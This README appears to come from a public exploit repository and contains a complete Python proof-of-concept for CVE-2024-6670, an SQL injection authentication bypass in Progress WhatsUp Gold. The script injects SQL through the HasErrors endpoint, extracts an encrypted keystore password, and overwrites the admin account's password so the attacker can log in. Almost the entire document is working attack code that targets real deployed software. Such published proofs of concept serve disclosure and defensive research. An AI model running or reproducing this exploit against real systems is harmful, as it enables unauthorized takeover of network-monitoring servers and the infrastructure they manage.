README.md
Rendering markdown...
"""
Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
Special Thanks to my dear friend Manish Kishan Tanwar @indishell1046
Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
"""
banner = r"""
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
"""
""""""
import urllib3
urllib3.disable_warnings()
import requests
import argparse
print(banner)
parser = argparse.ArgumentParser()
parser.add_argument('--target-url', '-t', dest='target_url', help="target url (e.g: https://192.168.1.1)", required=True)
parser.add_argument('--newpassword', '-n', dest='newpassword', help="new password to set for the administrator", required=True)
args = parser.parse_args()
args.target_url = args.target_url.rstrip("/")
def send_exploit(payload):
# psssst, I left a ton of IoCs, use them wisely
final_payload = f"DF215E10-8BD4-4401-B2DC-99BB03135F2E';{payload};--"
_json = {"deviceId":"22222","classId":final_payload,"range":"1","n":"1","start":"3","end":"4","businesdsHoursId":"5"}
requests.post(f"{args.target_url}/NmConsole/Platform/PerformanceMonitorErrors/HasErrors", json=_json, verify=False)
def retrieve_result():
res = requests.get(f"{args.target_url}/NmConsole/Platform/Filter/AlertCenterItemsReportThresholds", verify=False)
if(res.status_code != 200):
print("(!) exitting now because something wen't wrong when requesting the route /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds")
exit()
for item in res.json():
if("psyduck" in item["DisplayName"]):
return item['DisplayName'].replace('psyduck','')
def convert_to_varbinary(input_str):
byte_values = input_str.split(',')
hex_values = [format(int(value), '02X') for value in byte_values]
hex_string = ''.join(hex_values)
varbinary_string = '0x' + hex_string
return varbinary_string
def encrypt_password_primitive(new_password):
_json = {"KeyStorePassword":new_password, "TrustStorePassword":new_password}
res = requests.post(f"{args.target_url}/NmConsole/WugSystemAppSettings/JMXSecurity", json=_json, verify=False)
print("[*] Used remote primitive to encrypt our passowrd")
print("[^_^] Starting the exploit...")
encrypt_password_primitive(args.newpassword)
target_user = 'admin'
encrypted_password_exfil_payload = "UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd')"
send_exploit(encrypted_password_exfil_payload)
encrypted_password = retrieve_result()
encrypted_password = convert_to_varbinary(encrypted_password)
print(f"[*] encrypted password extracted -> " + encrypted_password)
update_password_payload = f"UPDATE WebUser SET sPassword = {encrypted_password} where sUserName = '{target_user}'"
send_exploit(update_password_payload)
print(f"[+] Exploit finished, you can now login using the username -> {target_user} and password -> {args.newpassword}")